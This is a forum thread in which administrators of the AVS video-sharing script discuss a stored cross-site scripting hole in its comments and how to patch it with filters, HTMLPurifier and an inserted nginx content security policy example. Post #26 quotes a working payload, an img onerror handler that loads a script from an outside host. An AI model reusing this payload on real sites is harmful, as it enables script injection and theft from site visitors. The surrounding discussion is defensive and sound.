
Attention hackers and comments!!!!!


27 replies to this topic

#21 Damien


Posted 24 July 2016 - 01:47 AM

avs admin imagine that will upgrade, for other people who have no solution.

 

What solution? I only see a joke as far as support goes. I doubt the guy who owns this script can even write hello world in PHP.


Edited by Damien, 24 July 2016 - 01:53 AM.


#22 apple82


Posted 24 July 2016 - 06:25 AM

What solution? I only see a joke as far as support goes. I doubt the guy who owns this script can even write hello world in PHP.

 

Yes, send email support avs.



#23 Damien


Posted 29 July 2016 - 07:08 AM

Yes, send email support avs.

 

We don't have this problem, we've solved it with a filter. Also, anyone using nginx can set a content security policy anyway; his .js script won't work then. https://content-security-policy.com/

 

My other point is no one should need to ask for help with this. It's a hole in the comments system that should be patched and updated; it's letting him run a .js file, it's an exploit imo.


Edited by Damien, 29 July 2016 - 07:10 AM.
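
Added example, not part of Damien's post or the AVS code: an nginx server block that sets the content security policy mentioned in post #23, with a weak policy shown commented out beside a stricter one. The server name, document root and PHP-FPM socket path are placeholders.

```nginx
# Added example. server_name, root and the fastcgi_pass socket are placeholders.
server {
    listen 80;
    server_name videos.example.com;
    root /var/www/avs;
    index index.php;

    # Weak: 'unsafe-inline' still lets an injected onerror= handler run, and the
    # wildcard source lets that handler load a script from any other host.
    # add_header Content-Security-Policy "default-src * 'unsafe-inline'" always;

    # Stricter: without 'unsafe-inline', browsers refuse inline scripts and
    # inline event handlers such as onerror=, and script-src 'self' refuses
    # script files served from any origin other than this site.
    # "always" attaches the header to error responses as well.
    add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'" always;

    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;
        # add_header is inherited from the server block only while this
        # location defines no add_header of its own. Adding one here would
        # silently drop the policy from every PHP response.
    }
}
```

A site that relies on its own inline scripts needs them moved into files before this policy is enforced; sending the same value as `Content-Security-Policy-Report-Only` first shows what would be blocked. The policy limits what a stored comment can do in the browser, while the comment itself stays in the database until the filter is fixed.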


#24 theone


Posted 22 November 2016 - 01:39 AM

I'm assuming this was patched in AVS 4 but if anyone has not fixed this I have a mod that will detect the malicious code and prevent the comment from posting, immediately ban the user, and provide you with a range of information about the malicious person including computer / browser specs, ip, geo location, etc.



#25 Yikmings


Posted 24 November 2016 - 10:47 AM

I fixed it by disabling and cleaning all comments in SQL.



#26 brianatthebeach


Posted 24 July 2017 - 05:53 AM

Anyone know if this is fixed?  I am currently on avs 3.3.  When I put in comment 

<img src=virink onerror=s=createElement('script');body.appendChild(s);s.src='http://www.besissy.com/h.js';><img src = etc etc
mg src=virink onerror=s=createElement('script');body.appendChild(s);s.src='http://www.besissy.com/h.js';>mg src = etc etc

The left angle bracket and i (<i) is removed from each occurrence in the comment.

 

Does this indicate I have a fix applied with 3.3?

 

Thanks,

Brian



#27 brianatthebeach


Posted 10 August 2017 - 09:59 PM

Hi,
 
I have a lot of mods in 3.3.  I won't be ready to go to 4.0 for a while and comments have been off for over a year now.  I see the new filter.class.php is only different in that it uses xss_filter and dependencies in htmlpurifier.
 
Can I simply upload htmlpurifier to classes and replace filter.class.php to get the comments protection?  It looks like it might work.
 
Thanks,
brian


#28 apple82


Posted 11 August 2017 - 07:10 AM

 

Hi,
 
I have a lot of mods in 3.3.  I won't be ready to go to 4.0 for a while and comments have been off for over a year now.  I see the new filter.class.php is only different in that it uses xss_filter and dependencies in htmlpurifier.
 
Can I simply upload htmlpurifier to classes and replace filter.class.php to get the comments protection?  It looks like it might work.
 
Thanks,
brian

 

Of course, files to repair the problem can always be added.